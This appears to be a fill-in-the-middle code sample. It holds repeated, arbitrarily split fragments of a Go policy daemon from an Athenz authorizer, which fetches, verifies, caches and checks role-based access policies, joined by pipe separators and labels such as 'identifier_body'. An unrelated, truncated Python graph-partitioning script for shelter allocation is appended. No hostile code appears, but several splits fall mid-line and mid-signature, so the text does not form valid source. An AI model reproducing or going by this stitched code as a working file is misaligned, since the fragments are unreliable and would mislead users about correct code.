rp.StartExpired(ctx, p.policyExpiredDuration).
EnableExpiredHook().
SetExpiredHook(func(ctx context.Context, key string) {
//key = <domain>:role.<role>
p.fetchAndCachePolicy(ctx, p.rolePolicies, strings.Split(key, ":role.")[0])
})
p.rolePolicies, rp = rp, p.rolePolicies
rp.Stop()
rp.Clear()
return nil
}
// CheckPolicy checks the specified request has privilege to access the resources or not.
// If return is nil then the request is allowed, otherwise the request is rejected.
func (p *policyd) CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error {
ech := make(chan error, 1)
cctx, cancel := context.WithCancel(ctx)
defer cancel()
go func() {
defer close(ech)
wg := new(sync.WaitGroup)
for _, role := range roles {
dr := fmt.Sprintf("%s:role.%s", domain, role)
wg.Add(1)
go func(ch chan<- error) {
defer wg.Done()
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
asss, ok := p.rolePolicies.Get(dr)
if !ok {
return
}
for _, ass := range asss.([]*Assertion) {
glg.Debugf("Checking policy domain: %s, role: %v, action: %s, resource: %s, assertion: %v", domain, roles, action, resource, ass)
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
if strings.EqualFold(ass.ResourceDomain, domain) && ass.Reg.MatchString(strings.ToLower(action+"-"+resource)) {
ch <- ass.Effect
return
}
}
}
}
}(ech)
}
wg.Wait()
ech <- errors.Wrap(ErrNoMatch, "no match")
}()
err := <-ech
glg.Debugf("check policy domain: %s, role: %v, action: %s, resource: %s, result: %v", domain, roles, action, resource, err)
return err
}
func (p *policyd) GetPolicyCache(ctx context.Context) map[string]interface{} {
return p.rolePolicies.ToRawMap(ctx)
}
func (p *policyd) fetchAndCachePolicy(ctx context.Context, g gache.Gache, dom string) error {
spd, upd, err := p.fetchPolicy(ctx, dom)
if err != nil {
glg.Debugf("fetch policy failed, err: %v", err)
return errors.Wrap(err, "error fetch policy")
}
glg.DebugFunc(func() string {
rawpol, _ := json.Marshal(spd)
return fmt.Sprintf("fetched policy data, domain: %s,updated: %v, body: %s", dom, upd, (string)(rawpol))
})
if err = simplifyAndCachePolicy(ctx, g, spd); err != nil {
glg.Debugf("simplify and cache error: %v", err)
return errors.Wrap(err, "error simplify and cache")
}
return nil
}
func (p *policyd) fetchPolicy(ctx context.Context, domain string) (*SignedPolicy, bool, error) {
glg.Infof("Fetching policy for domain %s", domain)
// https://{www.athenz.com/zts/v1}/domain/{athenz domain}/signed_policy_data
url := fmt.Sprintf("https://%s/domain/%s/signed_policy_data", p.athenzURL, domain)
glg.Debugf("fetching policy, url: %v", url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
glg.Errorf("fetch policy error, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error creating fetch policy request")
}
// etag header
t, ok := p.etagCache.Get(domain)
if ok {
ec := t.(*etagCache)
if time.Now().Add(p.expireMargin).UnixNano() < ec.sp.SignedPolicyData.Expires.UnixNano() {
glg.Debugf("domain: %s, using etag: %s", domain, ec.eTag)
req.Header.Set("If-None-Match", ec.eTag)
}
}
res, err := p.client.Do(req.WithContext(ctx))
if err != nil {
glg.Errorf("Error making HTTP request, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error making request")
}
// if server return NotModified, return policy from cache
if res.StatusCode == http.StatusNotModified {
cache := t.(*etagCache)
glg.Debugf("Server return not modified, domain: %s, etag: %v", domain, cache.eTag)
return cache.sp, false, nil
}
if res.StatusCode != http.StatusOK {
glg.Errorf("Domain %s: Server return not OK", domain)
return nil, false, errors.Wrap(ErrFetchPolicy, "error fetching policy data")
}
// read and decode
sp := new(SignedPolicy)
if err = json.NewDecoder(res.Body).Decode(&sp); err != nil {
glg.Errorf("Error decoding policy, domain: %s, err: %v", domain, err)
return nil, false, errors.Wrap(err, "error decode response")
}
// verify policy data
if err = sp.Verify(p.pkp); err != nil {
glg.Errorf("Error verifying policy, domain: %s,err: %v", domain, err)
return nil, false, errors.Wrap(err, "error verify policy data")
}
if _, err = io.Copy(ioutil.Discard, res.Body); err != nil {
glg.Warn(errors.Wrap(err, "error io.copy"))
}
if err = res.Body.Close(); err != nil {
glg.Warn(errors.Wrap(err, "error body.close"))
}
// set eTag cache
eTag := res.Header.Get("ETag")
if eTag != "" {
glg.Debugf("Setting ETag %v for domain %s", eTag, domain)
p.etagCache.SetWithExpire(domain, &etagCache{eTag, sp}, p.etagExpTime)
}
return sp, true, nil
}
func simplifyAndCachePolicy(ctx context.Context, rp gache.Gache, sp *SignedPolicy) error | {
eg := errgroup.Group{}
assm := new(sync.Map) // assertion map
// simplify signed policy cache
for _, policy := range sp.DomainSignedPolicyData.SignedPolicyData.PolicyData.Policies {
pol := policy
eg.Go(func() error {
for _, ass := range pol.Assertions {
select {
case <-ctx.Done():
return ctx.Err()
default:
km := fmt.Sprintf("%s,%s,%s", ass.Role, ass.Action, ass.Resource)
if _, ok := assm.Load(km); !ok {
assm.Store(km, ass)
} else {
// deny policy will override allow policy, and also remove duplication
if strings.EqualFold("deny", ass.Effect) {
assm.Store(km, ass)
}
}
}
}
return nil
})
}
if err := eg.Wait(); err != nil {
return errors.Wrap(err, "error simplify and cache policy")
}
// cache
var retErr error
assm.Range(func(k interface{}, val interface{}) bool {
ass := val.(*util.Assertion)
a, err := NewAssertion(ass.Action, ass.Resource, ass.Effect)
if err != nil {
glg.Debugf("error adding assertion to the cache, err: %v", err)
retErr = err
return false
}
var asss []*Assertion
r := ass.Role
if r, ok := rp.Get(r); ok {
asss = append(r.([]*Assertion), a)
} else {
asss = []*Assertion{a}
}
rp.SetWithExpire(ass.Role, asss, time.Duration(sp.DomainSignedPolicyData.SignedPolicyData.Expires.UnixNano()))
glg.Debugf("added assertion to the cache: %+v", ass)
return true
})
if retErr != nil {
return retErr
}
return nil
} | identifier_body | |
daemon.go | /*
Copyright (C) 2018 Yahoo Japan Corporation Athenz team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package policy
import (
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"strings"
"sync"
"time"
"github.com/kpango/gache"
"github.com/kpango/glg"
"github.com/pkg/errors"
"github.com/yahoo/athenz/utils/zpe-updater/util"
"github.com/yahoojapan/athenz-authorizer/pubkey"
"golang.org/x/sync/errgroup"
)
// Policyd represent the daemon to retrieve policy data from Athenz.
type Daemon interface {
Start(context.Context) <-chan error
Update(context.Context) error
CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error
GetPolicyCache(context.Context) map[string]interface{}
}
type policyd struct {
expireMargin time.Duration // expire margin force update policy when the policy expire time hit the margin
rolePolicies gache.Gache //*sync.Map // map[<domain>:role.<role>][]Assertion
policyExpiredDuration time.Duration
refreshDuration time.Duration
//flushDur time.Duration
errRetryInterval time.Duration
pkp pubkey.Provider
etagCache gache.Gache
etagFlushDur time.Duration
etagExpTime time.Duration
// www.athenz.com/zts/v1
athenzURL string
athenzDomains []string
client *http.Client
}
type etagCache struct {
eTag string
sp *SignedPolicy
}
// New represent the constructor of Policyd
func New(opts ...Option) (Daemon, error) {
p := &policyd{
rolePolicies: gache.New(),
etagCache: gache.New(),
}
for _, opt := range append(defaultOptions, opts...) {
if err := opt(p); err != nil {
return nil, errors.Wrap(err, "error create policyd")
}
}
return p, nil
}
// Start starts the Policy daemon to retrive the policy data periodically
func (p *policyd) Start(ctx context.Context) <-chan error {
glg.Info("Starting policyd updater")
ech := make(chan error, 100)
fch := make(chan struct{}, 1)
if err := p.Update(ctx); err != nil {
glg.Debugf("Error initialize policy data, err: %v", err)
ech <- errors.Wrap(err, "error update policy")
fch <- struct{}{}
}
go func() {
defer close(fch)
defer close(ech)
p.etagCache.StartExpired(ctx, p.etagFlushDur)
ticker := time.NewTicker(p.refreshDuration)
for {
select {
case <-ctx.Done():
glg.Info("Stopping policyd updater")
ticker.Stop()
ech <- ctx.Err()
return
case <-fch:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
time.Sleep(p.errRetryInterval)
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
case <-ticker.C:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
}
}
}()
return ech
}
// Update updates and cache policy data
func (p *policyd) Update(ctx context.Context) error {
glg.Info("Updating policy")
defer glg.Info("Updated policy")
eg := errgroup.Group{}
rp := gache.New()
for _, domain := range p.athenzDomains {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
dom := domain
eg.Go(func() error {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
return p.fetchAndCachePolicy(ctx, rp, dom)
}
})
}
}
if err := eg.Wait(); err != nil {
return err
}
rp.StartExpired(ctx, p.policyExpiredDuration).
EnableExpiredHook().
SetExpiredHook(func(ctx context.Context, key string) {
//key = <domain>:role.<role>
p.fetchAndCachePolicy(ctx, p.rolePolicies, strings.Split(key, ":role.")[0])
})
p.rolePolicies, rp = rp, p.rolePolicies
rp.Stop()
rp.Clear()
return nil
}
// CheckPolicy checks the specified request has privilege to access the resources or not.
// If return is nil then the request is allowed, otherwise the request is rejected.
func (p *policyd) CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error {
ech := make(chan error, 1)
cctx, cancel := context.WithCancel(ctx)
defer cancel()
go func() {
defer close(ech)
wg := new(sync.WaitGroup)
for _, role := range roles {
dr := fmt.Sprintf("%s:role.%s", domain, role)
wg.Add(1)
go func(ch chan<- error) {
defer wg.Done()
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
asss, ok := p.rolePolicies.Get(dr)
if !ok {
return
}
for _, ass := range asss.([]*Assertion) {
glg.Debugf("Checking policy domain: %s, role: %v, action: %s, resource: %s, assertion: %v", domain, roles, action, resource, ass)
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
if strings.EqualFold(ass.ResourceDomain, domain) && ass.Reg.MatchString(strings.ToLower(action+"-"+resource)) {
ch <- ass.Effect
return
}
}
}
}
}(ech)
}
wg.Wait()
ech <- errors.Wrap(ErrNoMatch, "no match")
}()
err := <-ech
glg.Debugf("check policy domain: %s, role: %v, action: %s, resource: %s, result: %v", domain, roles, action, resource, err)
return err
}
func (p *policyd) GetPolicyCache(ctx context.Context) map[string]interface{} {
return p.rolePolicies.ToRawMap(ctx)
}
func (p *policyd) | (ctx context.Context, g gache.Gache, dom string) error {
spd, upd, err := p.fetchPolicy(ctx, dom)
if err != nil {
glg.Debugf("fetch policy failed, err: %v", err)
return errors.Wrap(err, "error fetch policy")
}
glg.DebugFunc(func() string {
rawpol, _ := json.Marshal(spd)
return fmt.Sprintf("fetched policy data, domain: %s,updated: %v, body: %s", dom, upd, (string)(rawpol))
})
if err = simplifyAndCachePolicy(ctx, g, spd); err != nil {
glg.Debugf("simplify and cache error: %v", err)
return errors.Wrap(err, "error simplify and cache")
}
return nil
}
func (p *policyd) fetchPolicy(ctx context.Context, domain string) (*SignedPolicy, bool, error) {
glg.Infof("Fetching policy for domain %s", domain)
// https://{www.athenz.com/zts/v1}/domain/{athenz domain}/signed_policy_data
url := fmt.Sprintf("https://%s/domain/%s/signed_policy_data", p.athenzURL, domain)
glg.Debugf("fetching policy, url: %v", url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
glg.Errorf("fetch policy error, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error creating fetch policy request")
}
// etag header
t, ok := p.etagCache.Get(domain)
if ok {
ec := t.(*etagCache)
if time.Now().Add(p.expireMargin).UnixNano() < ec.sp.SignedPolicyData.Expires.UnixNano() {
glg.Debugf("domain: %s, using etag: %s", domain, ec.eTag)
req.Header.Set("If-None-Match", ec.eTag)
}
}
res, err := p.client.Do(req.WithContext(ctx))
if err != nil {
glg.Errorf("Error making HTTP request, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error making request")
}
// if server return NotModified, return policy from cache
if res.StatusCode == http.StatusNotModified {
cache := t.(*etagCache)
glg.Debugf("Server return not modified, domain: %s, etag: %v", domain, cache.eTag)
return cache.sp, false, nil
}
if res.StatusCode != http.StatusOK {
glg.Errorf("Domain %s: Server return not OK", domain)
return nil, false, errors.Wrap(ErrFetchPolicy, "error fetching policy data")
}
// read and decode
sp := new(SignedPolicy)
if err = json.NewDecoder(res.Body).Decode(&sp); err != nil {
glg.Errorf("Error decoding policy, domain: %s, err: %v", domain, err)
return nil, false, errors.Wrap(err, "error decode response")
}
// verify policy data
if err = sp.Verify(p.pkp); err != nil {
glg.Errorf("Error verifying policy, domain: %s,err: %v", domain, err)
return nil, false, errors.Wrap(err, "error verify policy data")
}
if _, err = io.Copy(ioutil.Discard, res.Body); err != nil {
glg.Warn(errors.Wrap(err, "error io.copy"))
}
if err = res.Body.Close(); err != nil {
glg.Warn(errors.Wrap(err, "error body.close"))
}
// set eTag cache
eTag := res.Header.Get("ETag")
if eTag != "" {
glg.Debugf("Setting ETag %v for domain %s", eTag, domain)
p.etagCache.SetWithExpire(domain, &etagCache{eTag, sp}, p.etagExpTime)
}
return sp, true, nil
}
func simplifyAndCachePolicy(ctx context.Context, rp gache.Gache, sp *SignedPolicy) error {
eg := errgroup.Group{}
assm := new(sync.Map) // assertion map
// simplify signed policy cache
for _, policy := range sp.DomainSignedPolicyData.SignedPolicyData.PolicyData.Policies {
pol := policy
eg.Go(func() error {
for _, ass := range pol.Assertions {
select {
case <-ctx.Done():
return ctx.Err()
default:
km := fmt.Sprintf("%s,%s,%s", ass.Role, ass.Action, ass.Resource)
if _, ok := assm.Load(km); !ok {
assm.Store(km, ass)
} else {
// deny policy will override allow policy, and also remove duplication
if strings.EqualFold("deny", ass.Effect) {
assm.Store(km, ass)
}
}
}
}
return nil
})
}
if err := eg.Wait(); err != nil {
return errors.Wrap(err, "error simplify and cache policy")
}
// cache
var retErr error
assm.Range(func(k interface{}, val interface{}) bool {
ass := val.(*util.Assertion)
a, err := NewAssertion(ass.Action, ass.Resource, ass.Effect)
if err != nil {
glg.Debugf("error adding assertion to the cache, err: %v", err)
retErr = err
return false
}
var asss []*Assertion
r := ass.Role
if r, ok := rp.Get(r); ok {
asss = append(r.([]*Assertion), a)
} else {
asss = []*Assertion{a}
}
rp.SetWithExpire(ass.Role, asss, time.Duration(sp.DomainSignedPolicyData.SignedPolicyData.Expires.UnixNano()))
glg.Debugf("added assertion to the cache: %+v", ass)
return true
})
if retErr != nil {
return retErr
}
return nil
}
| fetchAndCachePolicy | identifier_name |
daemon.go | /*
Copyright (C) 2018 Yahoo Japan Corporation Athenz team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package policy
import (
"context"
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"strings"
"sync"
"time"
"github.com/kpango/gache"
"github.com/kpango/glg"
"github.com/pkg/errors"
"github.com/yahoo/athenz/utils/zpe-updater/util"
"github.com/yahoojapan/athenz-authorizer/pubkey"
"golang.org/x/sync/errgroup"
)
// Policyd represent the daemon to retrieve policy data from Athenz.
type Daemon interface {
Start(context.Context) <-chan error
Update(context.Context) error
CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error
GetPolicyCache(context.Context) map[string]interface{}
}
type policyd struct {
expireMargin time.Duration // expire margin force update policy when the policy expire time hit the margin
rolePolicies gache.Gache //*sync.Map // map[<domain>:role.<role>][]Assertion
policyExpiredDuration time.Duration
refreshDuration time.Duration
//flushDur time.Duration
errRetryInterval time.Duration
pkp pubkey.Provider
etagCache gache.Gache | // www.athenz.com/zts/v1
athenzURL string
athenzDomains []string
client *http.Client
}
type etagCache struct {
eTag string
sp *SignedPolicy
}
// New represent the constructor of Policyd
func New(opts ...Option) (Daemon, error) {
p := &policyd{
rolePolicies: gache.New(),
etagCache: gache.New(),
}
for _, opt := range append(defaultOptions, opts...) {
if err := opt(p); err != nil {
return nil, errors.Wrap(err, "error create policyd")
}
}
return p, nil
}
// Start starts the Policy daemon to retrive the policy data periodically
func (p *policyd) Start(ctx context.Context) <-chan error {
glg.Info("Starting policyd updater")
ech := make(chan error, 100)
fch := make(chan struct{}, 1)
if err := p.Update(ctx); err != nil {
glg.Debugf("Error initialize policy data, err: %v", err)
ech <- errors.Wrap(err, "error update policy")
fch <- struct{}{}
}
go func() {
defer close(fch)
defer close(ech)
p.etagCache.StartExpired(ctx, p.etagFlushDur)
ticker := time.NewTicker(p.refreshDuration)
for {
select {
case <-ctx.Done():
glg.Info("Stopping policyd updater")
ticker.Stop()
ech <- ctx.Err()
return
case <-fch:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
time.Sleep(p.errRetryInterval)
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
case <-ticker.C:
if err := p.Update(ctx); err != nil {
ech <- errors.Wrap(err, "error update policy")
select {
case fch <- struct{}{}:
default:
glg.Warn("failure queue already full")
}
}
}
}
}()
return ech
}
// Update updates and cache policy data
func (p *policyd) Update(ctx context.Context) error {
glg.Info("Updating policy")
defer glg.Info("Updated policy")
eg := errgroup.Group{}
rp := gache.New()
for _, domain := range p.athenzDomains {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
dom := domain
eg.Go(func() error {
select {
case <-ctx.Done():
glg.Info("Update policy interrupted")
return ctx.Err()
default:
return p.fetchAndCachePolicy(ctx, rp, dom)
}
})
}
}
if err := eg.Wait(); err != nil {
return err
}
rp.StartExpired(ctx, p.policyExpiredDuration).
EnableExpiredHook().
SetExpiredHook(func(ctx context.Context, key string) {
//key = <domain>:role.<role>
p.fetchAndCachePolicy(ctx, p.rolePolicies, strings.Split(key, ":role.")[0])
})
p.rolePolicies, rp = rp, p.rolePolicies
rp.Stop()
rp.Clear()
return nil
}
// CheckPolicy checks the specified request has privilege to access the resources or not.
// If return is nil then the request is allowed, otherwise the request is rejected.
func (p *policyd) CheckPolicy(ctx context.Context, domain string, roles []string, action, resource string) error {
ech := make(chan error, 1)
cctx, cancel := context.WithCancel(ctx)
defer cancel()
go func() {
defer close(ech)
wg := new(sync.WaitGroup)
for _, role := range roles {
dr := fmt.Sprintf("%s:role.%s", domain, role)
wg.Add(1)
go func(ch chan<- error) {
defer wg.Done()
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
asss, ok := p.rolePolicies.Get(dr)
if !ok {
return
}
for _, ass := range asss.([]*Assertion) {
glg.Debugf("Checking policy domain: %s, role: %v, action: %s, resource: %s, assertion: %v", domain, roles, action, resource, ass)
select {
case <-cctx.Done():
ch <- cctx.Err()
return
default:
if strings.EqualFold(ass.ResourceDomain, domain) && ass.Reg.MatchString(strings.ToLower(action+"-"+resource)) {
ch <- ass.Effect
return
}
}
}
}
}(ech)
}
wg.Wait()
ech <- errors.Wrap(ErrNoMatch, "no match")
}()
err := <-ech
glg.Debugf("check policy domain: %s, role: %v, action: %s, resource: %s, result: %v", domain, roles, action, resource, err)
return err
}
func (p *policyd) GetPolicyCache(ctx context.Context) map[string]interface{} {
return p.rolePolicies.ToRawMap(ctx)
}
func (p *policyd) fetchAndCachePolicy(ctx context.Context, g gache.Gache, dom string) error {
spd, upd, err := p.fetchPolicy(ctx, dom)
if err != nil {
glg.Debugf("fetch policy failed, err: %v", err)
return errors.Wrap(err, "error fetch policy")
}
glg.DebugFunc(func() string {
rawpol, _ := json.Marshal(spd)
return fmt.Sprintf("fetched policy data, domain: %s,updated: %v, body: %s", dom, upd, (string)(rawpol))
})
if err = simplifyAndCachePolicy(ctx, g, spd); err != nil {
glg.Debugf("simplify and cache error: %v", err)
return errors.Wrap(err, "error simplify and cache")
}
return nil
}
func (p *policyd) fetchPolicy(ctx context.Context, domain string) (*SignedPolicy, bool, error) {
glg.Infof("Fetching policy for domain %s", domain)
// https://{www.athenz.com/zts/v1}/domain/{athenz domain}/signed_policy_data
url := fmt.Sprintf("https://%s/domain/%s/signed_policy_data", p.athenzURL, domain)
glg.Debugf("fetching policy, url: %v", url)
req, err := http.NewRequest(http.MethodGet, url, nil)
if err != nil {
glg.Errorf("fetch policy error, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error creating fetch policy request")
}
// etag header
t, ok := p.etagCache.Get(domain)
if ok {
ec := t.(*etagCache)
if time.Now().Add(p.expireMargin).UnixNano() < ec.sp.SignedPolicyData.Expires.UnixNano() {
glg.Debugf("domain: %s, using etag: %s", domain, ec.eTag)
req.Header.Set("If-None-Match", ec.eTag)
}
}
res, err := p.client.Do(req.WithContext(ctx))
if err != nil {
glg.Errorf("Error making HTTP request, domain: %s, error: %v", domain, err)
return nil, false, errors.Wrap(err, "error making request")
}
// if server return NotModified, return policy from cache
if res.StatusCode == http.StatusNotModified {
cache := t.(*etagCache)
glg.Debugf("Server return not modified, domain: %s, etag: %v", domain, cache.eTag)
return cache.sp, false, nil
}
if res.StatusCode != http.StatusOK {
glg.Errorf("Domain %s: Server return not OK", domain)
return nil, false, errors.Wrap(ErrFetchPolicy, "error fetching policy data")
}
// read and decode
sp := new(SignedPolicy)
if err = json.NewDecoder(res.Body).Decode(&sp); err != nil {
glg.Errorf("Error decoding policy, domain: %s, err: %v", domain, err)
return nil, false, errors.Wrap(err, "error decode response")
}
// verify policy data
if err = sp.Verify(p.pkp); err != nil {
glg.Errorf("Error verifying policy, domain: %s,err: %v", domain, err)
return nil, false, errors.Wrap(err, "error verify policy data")
}
if _, err = io.Copy(ioutil.Discard, res.Body); err != nil {
glg.Warn(errors.Wrap(err, "error io.copy"))
}
if err = res.Body.Close(); err != nil {
glg.Warn(errors.Wrap(err, "error body.close"))
}
// set eTag cache
eTag := res.Header.Get("ETag")
if eTag != "" {
glg.Debugf("Setting ETag %v for domain %s", eTag, domain)
p.etagCache.SetWithExpire(domain, &etagCache{eTag, sp}, p.etagExpTime)
}
return sp, true, nil
}
func simplifyAndCachePolicy(ctx context.Context, rp gache.Gache, sp *SignedPolicy) error {
eg := errgroup.Group{}
assm := new(sync.Map) // assertion map
// simplify signed policy cache
for _, policy := range sp.DomainSignedPolicyData.SignedPolicyData.PolicyData.Policies {
pol := policy
eg.Go(func() error {
for _, ass := range pol.Assertions {
select {
case <-ctx.Done():
return ctx.Err()
default:
km := fmt.Sprintf("%s,%s,%s", ass.Role, ass.Action, ass.Resource)
if _, ok := assm.Load(km); !ok {
assm.Store(km, ass)
} else {
// deny policy will override allow policy, and also remove duplication
if strings.EqualFold("deny", ass.Effect) {
assm.Store(km, ass)
}
}
}
}
return nil
})
}
if err := eg.Wait(); err != nil {
return errors.Wrap(err, "error simplify and cache policy")
}
// cache
var retErr error
assm.Range(func(k interface{}, val interface{}) bool {
ass := val.(*util.Assertion)
a, err := NewAssertion(ass.Action, ass.Resource, ass.Effect)
if err != nil {
glg.Debugf("error adding assertion to the cache, err: %v", err)
retErr = err
return false
}
var asss []*Assertion
r := ass.Role
if r, ok := rp.Get(r); ok {
asss = append(r.([]*Assertion), a)
} else {
asss = []*Assertion{a}
}
rp.SetWithExpire(ass.Role, asss, time.Duration(sp.DomainSignedPolicyData.SignedPolicyData.Expires.UnixNano()))
glg.Debugf("added assertion to the cache: %+v", ass)
return true
})
if retErr != nil {
return retErr
}
return nil
} | etagFlushDur time.Duration
etagExpTime time.Duration
| random_line_split |
_debug_alg.py | import os
import shared
import networkx as nx
import numpy as np
import pyximport; pyximport.install()
import fennel
# ******** SECTION 1 ************* #
try:
import config
except ImportError as err:
print(err)
print("**Could not load config.py\n**Copy config_template.py and rename it.")
pwd = os.getcwd()
DATA_FILENAME = os.path.join(pwd, "data", "oneshot_fennel_weights.txt")
OUTPUT_DIRECTORY = os.path.join(pwd, "output")
# Read input file for prediction model, if not provided a prediction
# model is made using FENNEL
PREDICTION_MODEL = ""
# File containing simulated arrivals. This is used in simulating nodes
# arriving at the shelter. Nodes represented by line number; value of
# 1 represents a node as arrived; value of 0 represents the node as not
# arrived or needing a shelter.
SIMULATED_ARRIVAL_FILE = os.path.join(pwd, "data", "simulated_arrival.txt")
#SIMULATED_ARRIVAL_FILE = ""
# File containing the geographic location of each node.
POPULATION_LOCATION_FILE = os.path.join(pwd, "data", "population_location.csv")
# Number of shelters
num_partitions = 4
# The number of iterations when making prediction model
num_iterations = 10
# Percentage of prediction model to use before discarding
# When set to 0, prediction model is discarded, useful for one-shot
prediction_model_cut_off = 0.10
# Alpha value used in one-shot (when restream_batches set to 1)
one_shot_alpha = 0.5
# Number of arrivals to batch before recalculating alpha and restreaming.
# When set to 1, one-shot is used with alpha value from above
restream_batches = 10
# Create virtual nodes based on prediction model
use_virtual_nodes = False
# Virtual nodes: edge weight
virtual_edge_weight = 1.0
####
# GRAPH MODIFICATION FUNCTIONS
# Also enables the edge calculation function.
graph_modification_functions = True
# If set, the node weight is set to 100 if the node arrives at the shelter,
# otherwise the node is removed from the graph.
alter_arrived_node_weight_to_100 = True
# Uses generalized additive models from R to generate prediction of nodes not
# arrived. This sets the node weight on unarrived nodes the the prediction
# given by a GAM.
# Needs POPULATION_LOCATION_FILE to be set.
alter_node_weight_to_gam_prediction = True
gam_k_value = 100
# Alter the edge weight for nodes that haven't arrived. This is a way to
# de-emphasise the prediction model for the unknown nodes.
prediction_model_emphasis = 1.0
# read METIS file
G = shared.read_metis(DATA_FILENAME)
# Alpha value used in prediction model
prediction_model_alpha = G.number_of_edges() * (num_partitions / G.number_of_nodes()**2)
# Order of nodes arriving
arrival_order = list(range(0, G.number_of_nodes()))
# Arrival order should not be shuffled if using GAM to alter node weights
#random.shuffle(arrival_order)
if SIMULATED_ARRIVAL_FILE == "":
# mark all nodes as needing a shelter
simulated_arrival_list = [1]*G.number_of_nodes()
else:
with open(SIMULATED_ARRIVAL_FILE, "r") as ar:
simulated_arrival_list = [int(line.rstrip('\n')) for line in ar]
print("Graph loaded...")
print("Nodes: {}".format(G.number_of_nodes()))
print("Edges: {}".format(G.number_of_edges()))
if nx.is_directed(G):
print("Graph is directed")
else:
print("Graph is undirected")
# ******** END SECTION 1 ********** #
# ******** SECTION 2 **************#
# setup for other algorithms
if config.ENABLE_SCOTCH == True:
# import the relevant SCOTCH modules
from scotch.graph_mapper import GraphMapper
from scotch.io import ScotchGraphArrays
UNMAPPED = -1
# reset
assignments = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fixed = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
print("PREDICTION MODEL")
print("----------------")
# Display which algorithm is being run
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
print("Using: FENNEL Partitioning")
print("---------------\n")
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
print("Using: SCOTCH Partitioning")
print("--------------------------\n")
predictionModels = {}
# store model data for different types of partitioners
# NOTE: THIS IS NOT IMPLEMENTED YET - need to discuss first
if config.RUN_ALL_PREDICTION_MODEL_ALGORITHMS == True:
# create different prediction models
fennelModel = {}
fennelModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
fennelModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.FENNEL] = fennelModel
scotchModel = {}
scotchModel['assignments'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
scotchModel['fixed'] = np.repeat(np.int32(UNMAPPED), G.number_of_nodes())
predictionModels[config.Partitioners.SCOTCH] = scotchModel
# Begin computation of prediction model
if PREDICTION_MODEL:
# if we have a prediction model from file, load it
with open(PREDICTION_MODEL, "r") as inf:
assignments = np.fromiter(inf.readlines(), dtype=np.int32)
else:
# choose the right algorithm
if config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.FENNEL:
assignments = fennel.generate_prediction_model(G, num_iterations, num_partitions, assignments, fixed, prediction_model_alpha)
elif config.PREDICTION_MODEL_ALGORITHM == config.Partitioners.SCOTCH:
# SCOTCH algorithm
# we have a networkx graph already, G
scotchArrays = ScotchGraphArrays() # create the object storing all the SCOTCH arrays
scotchArrays.fromNetworkxGraph(G, baseval=0) # populate arrays from G
#scotchArrays.debugPrint() # uncomment this to print out contents of scotchArrays
# create instance of SCOTCH Library
mapper = GraphMapper(config.SCOTCH_LIB_PATH)
# set some optional parameters for the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph
# see csap-graphpartitioning/src/python/scotch/graph_mapper: GraphMapper.__init__() method for more options
mapper.kbalval = 0.1
mapper.numPartitions = num_partitions
# intializes the SCOTCH_Arch, SCOTCH_Strat, SCOTCH_Graph using scotchArray and optional parameters
ok = mapper.initialize(scotchArrays, verbose=False)
if(ok):
# we can proceed with graphMap, the data structures were setup correctly
ok = mapper.graphMap()
if(ok):
# graphMap was run successfully, copy the assignments
# make a deep copy as we then delete the mapper data, to clear memory
# and the array reference may be lost
assignments = np.array(mapper.scotchData._parttab, copy=True)
mapper.delObjects()
else:
print('Error while running graphMap()')
else:
print('Error while setting up SCOTCH for partitioning.')
x = shared.score(G, assignments, num_partitions)
edges_cut, steps = shared.base_metrics(G, assignments)
print("WASTE\t\tCUT RATIO\tEDGES CUT\tCOMM VOLUME")
